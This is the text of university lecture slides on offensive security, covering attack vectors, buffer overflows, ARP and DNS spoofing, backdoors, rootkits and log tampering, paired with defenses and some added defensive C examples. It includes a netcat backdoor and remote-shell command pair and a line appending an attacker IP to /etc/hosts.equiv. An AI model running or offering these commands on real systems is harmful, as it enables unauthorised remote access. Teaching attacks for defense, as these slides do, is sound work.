Offensive technologies Fall 2017 - UniTrento

06/10/17

Offensive technologies Fall 2017

Lecture 4 – Gaining Access
Fabio Massacci

(Some slides courtesy of Jelena Mirkovic)

06/10/17 Fabio Massacci - Offensive Technologies 1

Ethical Acceptance
•  You are bound by the terms and conditions of this course
  –  You try offensive technologies only in the lab
  –  You are not allowed to disclose information about any individual that you find during the analysis
  –  Your final deliverable, as approved by the professor, is the only public deliverable you are allowed to disclose to third parties
•  Any use outside the agreed framework of the course may be penally relevant (i.e. a crime)
  –  Everything is isolated from the rest of the infrastructure → you must deliberately exfiltrate material → you cannot claim that it "happened by mistake"
  –  The same considerations apply if you give material to other students who have not signed the agreement → aiding and abetting = same penal responsibility as if you did it yourself.


Attack delivery
•  Type of infection is a function of the attacker's goal:
  –  Botnet creation → simple form of control for limited functionalities
  –  Virus/keylogger → credential theft/spoofing/spam/remote control
  –  Full-fledged backdoors → monitoring/remote control
  –  Ransomware → direct monetisation & low profile
•  Regardless of what the attacker wants to do, he/she must have some level of access to the machine
  –  Remote control = long-term avenue for the attacker to "valorize" the infection, but may not be necessary

How does the infection happen?
•  Human vector (social engineering) → user vulnerability
  –  The attacker convinces the user to do something for him/her (e.g. install a virus masked as an anti-virus → fake AV)
•  Technological vector → software vulnerability
  –  Principal cause is that most systems are not capable of distinguishing "legitimate" input from "rogue" input (e.g. as provided by the attacker)
  –  The system executes whatever's in memory.
  –  Virtually any software has bugs that the attacker can exploit to deviate the execution of the software towards actions in his own agenda.
•  Mixed: e.g. link on a social network, link clicked by a user in a document, opening an email carrying malware, IP-connected camera with pre-loaded malware, etc.


Human vector: social engineering
•  Attacker convinces the user to install a virus masked as a legitimate application
•  The example here is a fake antivirus product called "Win8 Security System"
  –  User thinks it's actual AV
  –  In reality it infects the system

Example of attempted infection
(screenshot slide; only the title survives in the text)


Technological vector
•  The attack usually exploits some vulnerability in software
•  System is fed with computationally valid code as input to a vulnerable software → code is executed
•  Several types of vulnerabilities
  –  XSS
  –  Buffer overflow
  –  SQLi
  –  Privilege escalation
  –  …
•  More exercises and details in
  –  Network Security Course
  –  Security Testing Course

Vulnerability examples
(figure slide; only the title survives in the text)


Buffer Overflow Attacks
•  Aka stack-based overflow attacks
•  Stack stores important data on procedure call

[Stack layout figure, from higher to lower memory addresses: function call arguments, return address, saved frame ptr, local variables for called procedure; TOS (top of stack) at the bottom; memory address increases upwards]

Buffer Overflow Attacks
•  Consider a function

    #include <string.h>

    void sample_function(char* s) {
        char buffer[10];            /* only 10 bytes reserved on the stack */
        strcpy(buffer, s);          /* no length check: copies until the NUL of s */
        return;
    }

•  And a main program

    int main(void) {
        int i;
        char temp[200];
        for (i = 0; i < 200; i++)
            temp[i] = 'A';
        temp[199] = '\0';           /* terminator added so strcpy() stops: 199 'A's still overflow */
        sample_function(temp);      /* 199 bytes + NUL written into a 10-byte buffer */
        return 0;
    }

Argument is larger than we expected


Buffer Overflow Attacks
•  Large input will be stored on the stack, overwriting system information

[Stack layout figure: function call arguments, return address, saved frame ptr, and s / buffer[10] at TOS are all overwritten by A's; memory address increases upwards]

Buffer Overflow Attacks
•  Attacker overwrites return address to point somewhere else
  –  "Local variables" portion of the stack
  –  Places attack code in machine language at that portion
  –  Since it is difficult to know the exact address of the portion, pads attack code with NOPs before and after


Buffer Overflow Attacks
•  Intrusion Detection Systems (IDSs) could look for a sequence of NOPs to spot buffer overflows
  –  Attacker uses polymorphism: he transforms the code so that NOP is changed into some other command that does the same thing, e.g. MOV R1, R1
  –  Attacker XORs important commands with a key
  –  Attacker places the XOR command and the key just before the encrypted attack code. The XOR command is also obscured

Buffer Overflow Attacks
•  What type of commands does the attacker execute?
  –  Commands that help him gain access to the machine
  –  Writes a string into the inetd.conf file to start a shell application listening on a port, then "logs on" through that port
  –  Starts Xterm


Buffer Overflow Attacks
•  How does an attacker discover a buffer overflow?
  –  Looks at the source code
  –  Runs the application on his machine, tries to supply long inputs and looks at system registers
•  Read more at
  –  http://insecure.org/sw/smashstack.html

Defenses Against Buffer Overflows
•  For system administrators:
  –  Apply patches, keep systems up-to-date
  –  Disable execution from the stack
  –  Monitor writes on the stack
  –  Store return address somewhere else
  –  Monitor outgoing traffic
•  For software designers
  –  Apply checks for buffer overflows
  –  Use safe functions
  –  Static and dynamic code analysis
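The two "software designer" defenses applied to the slide's sample_function, as an added example that is not part of the lecture: a length check that rejects oversized input, and a bounded copy with snprintf() that cannot run past the 10-byte buffer. The function names and the 200-byte argument of 'A's are ours.

```c
/* Added example (not from the lecture): the two "software designer" defenses
 * applied to the slide's sample_function. Function names are ours. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 10

/* Defense 1: apply a check. Reject input that does not fit instead of letting
 * strcpy() run past buffer[] onto the saved frame pointer and return address.
 * Returns 0 on success, -1 if the argument is larger than expected. */
int sample_function_checked(const char *s)
{
    char buffer[BUF_SIZE];
    size_t len = strlen(s);
    if (len >= BUF_SIZE)            /* need room for the terminating NUL */
        return -1;
    memcpy(buffer, s, len + 1);     /* provably in bounds */
    return 0;
}

/* Defense 2: use a safe function. snprintf() never writes more than out_size
 * bytes and always NUL-terminates, so oversized input is truncated rather than
 * spilled. Returns the bytes stored (without NUL) so callers see truncation. */
size_t sample_function_safe(const char *s, char *out, size_t out_size)
{
    int n = snprintf(out, out_size, "%s", s);
    if (n < 0) return 0;
    return (size_t)n >= out_size ? out_size - 1 : (size_t)n;
}

/* The slide's 200-byte argument of 'A's (constructed), fed to both versions. */
int demo(void)
{
    char temp[200], buffer[BUF_SIZE];
    memset(temp, 'A', sizeof temp - 1);
    temp[sizeof temp - 1] = '\0';
    int rejected = sample_function_checked(temp) == -1;
    size_t stored = sample_function_safe(temp, buffer, sizeof buffer);
    /* 1: rejected by the check, truncated to 9 bytes + NUL by the safe copy */
    return rejected && stored == BUF_SIZE - 1 && buffer[BUF_SIZE - 1] == '\0';
}

int main(void)
{
    printf("overflow prevented: %s\n", demo() ? "yes" : "no");
    return 0;
}
```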


Network Attacks
•  Sniffing for passwords and usernames
•  Spoofing addresses
•  Hijacking a session

Sniffing
•  Looking at raw packet information on the wire
  –  Some media is more prone to sniffing – Ethernet
  –  Some network topologies are more prone to sniffing – hub vs. switch


Sniffing On a Hub
•  Ethernet is a broadcast media – every machine connected to it can hear all the information
  –  Passive sniffing

[Figure: hosts X and Y and attacker A connected to hub R; a frame "For X" is repeated on every port, so A hears it too]

Sniffing On a Hub
•  Attacker can get anything that is not encrypted and is sent to the LAN
  –  Defense: encrypt all sensitive traffic
  –  Tcpdump
    •  http://www.tcpdump.org
  –  Snort
    •  http://www.snort.org
  –  Ethereal
    •  http://www.ethereal.com


Sniffing On a Switch
•  Switch is connected by a separate physical line to every machine and it chooses only one line to send the message

[Figure: hosts X and Y and attacker A connected to switch R; the frame "For X" is forwarded only on X's line]

Sniffing On a Switch – Take 1
•  Attacker sends a lot of ARP messages for fake addresses to R
  –  Some switches send on all interfaces when their table overloads

[Figure: same topology; once R's table has overflowed, the frame "For X" goes out on every line, including A's]


Sniffing On a Switch – Take 2
•  Address Resolution Protocol (ARP) maps IP addresses to MAC addresses

[Figure, normal ARP resolution: 1. a frame "For X" is sent towards R; 2. "Who has X?" is broadcast; 3. X answers "I do"; 4. the frame "For X" is delivered to X]

Sniffing On a Switch – Take 2
•  Attacker uses ARP poisoning to map his MAC address to IP address X

[Figure, steps 1-5: 1. A sends the unsolicited replies "I have X, MAC(A)" and "I have Y, MAC(A)"; 2. Y sends a frame "For X"; 3. it is switched to "X, MAC(A)", i.e. to A; 4. A re-sends it as "For X, MAC(X)"; 5. the frame "For X, MAC(X)" reaches X]


Sniffing On a Switch – Take 2
•  Attacker uses ARP poisoning to map his MAC address to IP address X

[Figure, steps 6-9: 6. X answers with a frame "For Y"; 7. it is switched to "Y, MAC(A)", i.e. to A; 8. A re-sends it as "For Y, MAC(Y)"; 9. the frame "For Y, MAC(Y)" reaches Y. A now sits in the middle of both directions]

Active Sniffing Tools
•  Dsniff
  –  http://www.monkey.org/~dugsong/dsniff
  –  Also parses application packets for a lot of applications
  –  Sniffs and spoofs DNS
Dangerous


Spoofing DNS
•  Attacker sniffs DNS requests, replies with his own address faster than the real server (DNS cache poisoning)
•  When the real reply arrives the client ignores it
•  This can be coupled with an attack on HTTPS and SSH if self-signed certificates are allowed

Sniffing Defenses
•  Use end-to-end encryption like DNSSEC
  –  No one can sniff application traffic like DNS
  –  DNS servers would need to support encryption too
•  Use static switch configuration
  –  Statically configure MAC and IP bindings with ports
  –  No one can spoof the ARP-IP mapping
•  Don't accept suspicious certificates
  –  Even if someone can hijack DNS names they cannot generate valid certificates
  –  Prevents HTTPS/SSH attacks
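The "statically configure MAC and IP bindings" defense turned into a check, as an added example that is not part of the lecture: a detector that parses an ARP frame and compares the sender's IP/MAC pair against the administrator's static table, so the unsolicited "I have X, MAC(A)" reply from step 1 of the ARP-poisoning slides is flagged while X's own reply passes. Hosts X, Y and A, their addresses, the table and the frames are all constructed for the demo.

```c
/* Added example (not part of the lecture): enforcing the "static MAC/IP
 * bindings" defense as a check on ARP frames. Hosts X, Y, attacker A, their
 * addresses and the frames are constructed for the demo. */
#include <stdint.h>
#include <string.h>

#define ETH_HDR 14           /* dst(6) src(6) ethertype(2) */
#define ARP_LEN 28           /* IPv4-over-Ethernet ARP body */
struct binding { uint8_t ip[4]; uint8_t mac[6]; };

/* The administrator's static ARP/IP table (constructed). */
static const struct binding table[] = {
    { {10, 0, 0, 2}, {0x02, 0, 0, 0, 0, 0x02} },   /* X */
    { {10, 0, 0, 3}, {0x02, 0, 0, 0, 0, 0x03} },   /* Y */
};

/* Verdict: 0 = not ARP or consistent; 1 = a bound IP is claimed with another
 * MAC (poisoning); 2 = ARP sender MAC differs from the Ethernet source MAC. */
int check_arp_frame(const uint8_t *frame, size_t len)
{
    if (len < ETH_HDR + ARP_LEN) return 0;
    if (((frame[12] << 8) | frame[13]) != 0x0806) return 0;   /* EtherType ARP */
    const uint8_t *sha = frame + ETH_HDR + 8;    /* sender hardware address */
    const uint8_t *spa = frame + ETH_HDR + 14;   /* sender protocol address */
    if (memcmp(sha, frame + 6, 6) != 0) return 2;
    for (size_t i = 0; i < sizeof table / sizeof table[0]; i++)
        if (memcmp(spa, table[i].ip, 4) == 0 && memcmp(sha, table[i].mac, 6) != 0)
            return 1;                            /* someone else claims this IP */
    return 0;
}

/* Build a broadcast ARP reply "spa is at sha" with Ethernet source src. */
size_t build_arp_reply(uint8_t *f, const uint8_t *src, const uint8_t *sha,
                       const uint8_t *spa)
{
    memset(f, 0, ETH_HDR + ARP_LEN);
    memset(f, 0xff, 6); memcpy(f + 6, src, 6);   /* broadcast dst */
    f[12] = 0x08; f[13] = 0x06;                  /* EtherType ARP */
    uint8_t *a = f + ETH_HDR;
    a[1] = 1; a[2] = 0x08; a[4] = 6; a[5] = 4;   /* Ethernet, IPv4, hlen, plen */
    a[7] = 2;                                    /* opcode 2 = reply */
    memcpy(a + 8, sha, 6); memcpy(a + 14, spa, 4);
    return ETH_HDR + ARP_LEN;
}

/* poisoned = 1: step 1 of the slide, A's unsolicited "I have X, MAC(A)";
 * poisoned = 0: X's own legitimate reply. Returns the detector's verdict. */
int demo_arp(int poisoned)
{
    static const uint8_t mac_x[6] = {0x02, 0, 0, 0, 0, 0x02}, mac_a[6] = {0x02, 0, 0, 0, 0, 0x0a};
    static const uint8_t ip_x[4] = {10, 0, 0, 2};
    const uint8_t *m = poisoned ? mac_a : mac_x;
    uint8_t f[ETH_HDR + ARP_LEN];
    return check_arp_frame(f, build_arp_reply(f, m, m, ip_x));   /* 1 or 0 */
}
```

A switch or IDS doing this for real also needs to learn which replies were solicited; this stateless check only catches bindings that contradict the configured table.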


What Is IP Spoofing
•  Faking somebody else's IP address in the IP source address field
•  How to spoof?
  –  Linux and BSD OS have functions that enable the superuser to create custom packets and fill in any information
  –  Windows XP also has this capability but earlier Windows versions don't

IP Address Spoofing in TCP packets
•  Attacker cannot see reply packets

[Figure, three parties Alice, Bob and Attacker: 1. Attacker sends SYN with source IP Alice and SEQ A to Bob; 2. Bob replies SYN SEQ B, ACK SEQ A to Alice; 3. Alice, who never opened the connection, answers with RESET]


Guessing a Sequence Number
•  Attacker wants to assume Alice's identity
  –  He establishes many connections to Bob with his own identity, gets a few sequence numbers
  –  He disables Alice (DDoS)
  –  He sends SYN to Bob, Bob replies to Alice, attacker uses the guessed value of SEQ B to complete the connection – TCP session hijacking
  –  If Bob and Alice have a trust relationship (/etc/hosts.equiv file in Linux) he has just gained access to Bob
  –  He can add his machine to /etc/hosts.equiv: echo "1.2.3.4" >> /etc/hosts.equiv
•  How easy is it to guess SEQ B?

Guessing a Sequence Number
•  It used to be ISN = f(Time), still is in some Windows versions


Guessing a Sequence Number
•  On Linux ISN = f(time) + rand

Guessing a Sequence Number
•  On BSD ISN = rand


Spoofing Defenses
•  Ingress and egress filtering
•  Don't use trust models with IP addresses
•  Randomize sequence numbers

At The End of Gaining Access
•  Attacker has successfully logged onto a machine


Phase 4: Maintaining Access
•  Attacker establishes a listening application on a port (backdoor) so he can log on any time with or without a password
•  Attackers frequently close security holes they find

Netcat Tool
•  Similar to the Linux cat command
  –  http://netcat.sourceforge.net/
  –  Client: Initiates connection to any port on remote machine
  –  Server: Listens on any port
  –  To open a shell on a victim machine

    On victim machine:    nc -l -p 1234                     /* This opens a backdoor */
    On attacker machine:  nc 123.32.34.54 1234 -c /bin/sh   /* This enters through a backdoor, opens a shell */

Dangerous


Netcat Tool
•  Used for
  –  Port scanning
  –  Backdoor
  –  Relaying the attack

Trojans
•  Application that claims to do one thing (and looks like it) but also does something malicious
•  Users download Trojans from the Internet (thinking they are downloading a free game) or get them as greeting cards in E-mail, or as ActiveX controls when they visit a Web site
•  Trojans can scramble your machine
  –  They can also open a backdoor on your system
•  They will also report successful infection to the attacker


Back Orifice
•  Trojan application that can
  –  Log keystrokes
  –  Steal passwords
  –  Create dialog boxes
  –  Mess with files, processes or system (registry)
  –  Redirect packets
  –  Set up backdoors
  –  Take over screen and keyboard
  –  http://www.bo2k.com/

Trojan Defenses
•  Antivirus software
•  Don't download suspicious software
•  Check the MD5 sum of trusted software you download
•  Disable automatic execution of attachments


At the End of Maintaining Access
•  The attacker has opened a backdoor and can now access the victim machine at any time

Phase 5: Covering Tracks
•  Rootkits
•  Alter logs
•  Create hard-to-spot files
•  Use covert channels


Application Rootkits
•  Alter or replace system components (for instance DLLs)
•  E.g., on Linux the attacker replaces the ls program
•  Rootkits frequently come together with sniffers:
  –  Capture a few characters of all sessions on the Ethernet and write them into a file to steal passwords
  –  Administrator would notice an interface in promiscuous mode
    •  Not if the attacker modifies an application that shows interfaces - netstat

Application Rootkits
•  Attacker will modify all key system applications that could reveal his presence
  –  List processes, e.g. ps
  –  List files, e.g. ls
  –  Show open ports, e.g. netstat
  –  Show system utilization, e.g. top
•  He will also substitute the modification date with one in the past


Defenses Against App. Rootkits
•  Don't let attackers gain root access
•  Use integrity checking of files:
  –  Carry a floppy with md5sum, check hashes of system files against hashes advertised on the vendor site or hashes you stored before
•  Use Tripwire
  –  Free integrity checker that saves md5sums of all important files in a secure database (read-only CD), then verifies them periodically
  –  http://www.tripwire.org/

Kernel Rootkits
•  Replace system calls
  –  Intercept calls to open one application with calls to open another, of the attacker's choosing
  –  Now even checksums don't help, as the attacker did not modify any system applications
  –  You won't even see the attacker's files in the file listing
  –  You won't see some processes or open ports
•  Usually installed as kernel modules
•  Defenses: disable kernel modules


Altering Logs
•  For binary logs:
  –  Stop logging services
  –  Load files into memory, change them
  –  Restart logging service
  –  Or use a special tool
•  For text logs simply change the file through scripts
•  Change login and event logs, command history file, last login data

Defenses Against Altering Logs
•  Use separate log servers
  –  Machines will send their log messages to these servers
•  Encrypt log files
•  Make log files append-only
•  Save logs on write-once media


Creating Hard-to-Spot Files
•  Names could look like system file names, but slightly changed
  –  Start with .
  –  Start with . and add spaces
  –  Make files hidden
•  Defenses: intrusion detection systems and caution
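The "caution" defense made mechanical, as an added example that is not part of the lecture: a classifier that flags directory entry names using the tricks above (a leading dot, padded spaces, non-printable bytes, and names that collapse to a system binary's name once those tricks are undone). The list of system names is a constructed sample; a real check would use the host's own inventory.

```c
/* Added example (not from the lecture): a classifier for the hard-to-spot
 * file name tricks above. The system-name list is a constructed sample. */
#include <ctype.h>
#include <string.h>

#define F_LEADING_DOT    1   /* hidden: name starts with "."                    */
#define F_WHITESPACE     2   /* spaces or tabs in the name, e.g. ". " or "ls "  */
#define F_NONPRINTABLE   4   /* control or non-ASCII bytes in the name          */
#define F_MIMICS_SYSTEM  8   /* equals a system name once the tricks are undone */

static const char *system_names[] = { "ls", "ps", "netstat", "top", "sshd" };

/* Bitmask of suspicious properties of one directory entry name. "." and ".."
 * are never flagged; a plain dotfile such as ".bashrc" is F_LEADING_DOT only. */
int classify_name(const char *name)
{
    char stripped[256];               /* NAME_MAX on Linux is 255 */
    size_t i, k = 0, len = strlen(name);
    int flags = 0;

    if (len == 0 || len >= sizeof stripped) return F_NONPRINTABLE; /* malformed */
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    if (name[0] == '.') flags |= F_LEADING_DOT;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == ' ' || c == '\t') { flags |= F_WHITESPACE; continue; }
        if (!isprint(c))           { flags |= F_NONPRINTABLE; continue; }
        if (c == '.' && k == 0)    continue;          /* drop leading dots */
        stripped[k++] = (char)c;
    }
    stripped[k] = '\0';
    /* A name that collapses to a system name is only suspicious if it needed
     * collapsing: "ls" itself stays clean, ".ls" and "ls " do not. */
    for (i = 0; flags && i < sizeof system_names / sizeof system_names[0]; i++)
        if (strcmp(stripped, system_names[i]) == 0) flags |= F_MIMICS_SYSTEM;
    return flags;
}
```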

Additional Readings
•  First academic paper mentioning 0-days (that I know of)
  –  O. Arkin. "Tracing Hackers: Part 1." Computers and Security, 2002.
•  Insight in the market
  –  C. Miller. The Legitimate Vulnerability Market. Workshop on Economics of Information Security, 2006.
  –  Axel Arnbak, Hadi Asghari, Michel Van Eeten, and Nico Van Eijk. "Security Collapse in the HTTPS Market". Communications of the ACM 57, no. 10 (2014): 47-55.
•  Some different perspectives on cybercrime
  –  Nick Nykodym et al. "Criminal profiling and insider cybercrime." Digital Investigation, 2005.
  –  D. Florencio et al. "Sex, Lies and Cybercrime Surveys". Workshop on Economics of Information Security, 2006.
  –  J. Franklin. "An Inquiry into the Nature and Causes of the Wealth of Internet Miscreants". ACM Conference on Computer and Communication Security, 2007.
•  A tutorial on the difficulty of attribution
  –  M. Marquis-Boire. Big Game Hunting: The Peculiarities of Nation-State Malware Research. Black Hat USA, 2015.
